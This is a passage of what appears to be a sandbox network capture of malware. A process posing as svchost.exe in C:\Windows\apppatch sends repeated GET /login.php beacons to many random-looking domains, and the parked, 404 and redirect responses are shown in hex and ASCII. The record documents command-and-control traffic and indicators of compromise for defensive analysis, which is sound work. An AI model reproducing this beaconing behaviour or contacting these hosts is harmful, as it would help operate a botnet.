                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 72 67 56 4c 42 76 44 6d 6e 7a 4c 50 6d 66 71 48 38 38 32 69 73 55 4d 54 59 6e 30 53 7a 51 68 67 71 79 51 6e 4e 32 39 75 45 45 57 57 6d 6f 2b 68 34 57 4f 63 63 4b 6b 44 4a 50 7a 75 39 36 5a 77 2f 36 30 44 79 72 50 6c 4d 58 62 77 36 62 38 36 50 2b 62 32 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TrgVLBvDmnzLPmfqH882isUMTYn0SzQhgqyQnN29uEEWWmo+h4WOccKkDJPzu96Zw/60DyrPlMXbw6b86P+b2w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.685791016 CET664INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                  Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjA5N2VhY2EtZWExYS00YThkLThiZWUtYTI5NjhjN2ViYTdiIiwicGFnZV90aW1lIjoxNzMxMzQ3NDQwLCJwYWdlX3VybCI6I


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  31192.168.2.64982164.225.91.73801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.513499022 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyhyg.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.059688091 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                                  server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:41 GMT
                                                                                                                                                                                                                  content-type: text/html
                                                                                                                                                                                                                  content-length: 593
                                                                                                                                                                                                                  last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                                  etag: "63f68860-251"
                                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  32192.168.2.64982272.52.179.174801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.718429089 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyhub.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  33192.168.2.64982972.52.179.174801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.214312077 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyhub.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  34192.168.2.65336152.34.198.229801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.812176943 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lygyvuj.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.502927065 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:45 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=b255da44d539af88139917f5305c831f|66.23.206.109|1731347445|1731347445|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  35192.168.2.65337744.221.84.105801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.945445061 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyhiz.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.379331112 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:47 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=c2814cfe50fffab8ec877b7f0a2e5795|66.23.206.109|1731347447|1731347447|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  36192.168.2.653397199.59.243.227801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.356956005 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.810888052 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 409f526f-1eb8-4a43-8c10-fa625dad446a
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:05:48 GMT
                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.810992002 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDQ4LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  37192.168.2.65464223.253.46.64801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.371059895 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.826980114 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:43 GMT
                                                                                                                                                                                                                  Content-Length: 1245
                                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.826992035 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                                  Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  38192.168.2.65464385.17.31.122801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.385489941 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  39192.168.2.65464475.2.71.199801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.389873028 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.845155001 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Location: https://puzylyp.com/login.php
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  40192.168.2.65464685.17.31.122801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.867609978 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  41192.168.2.65464823.253.46.64801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.890130043 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:49.343508005 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:43 GMT
                                                                                                                                                                                                                  Content-Length: 1245
                                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                                  Nov 11, 2024 18:50:49.343521118 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                                  Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  42192.168.2.654724103.224.212.210801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.165591002 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyxynyx.com
                                                                                                                                                                                                                  Cookie: __tad=1731347439.3564880
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.867031097 CET244INHTTP/1.1 302 Found
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  server: Apache
                                                                                                                                                                                                                  location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0450-586c-82c6-824410e64c84
                                                                                                                                                                                                                  content-length: 2
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  Data Raw: 0a 0a
                                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  43192.168.2.654725103.224.182.252801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.251365900 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vofycot.com
                                                                                                                                                                                                                  Cookie: __tad=1731347439.2338786
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.867954969 CET242INHTTP/1.1 302 Found
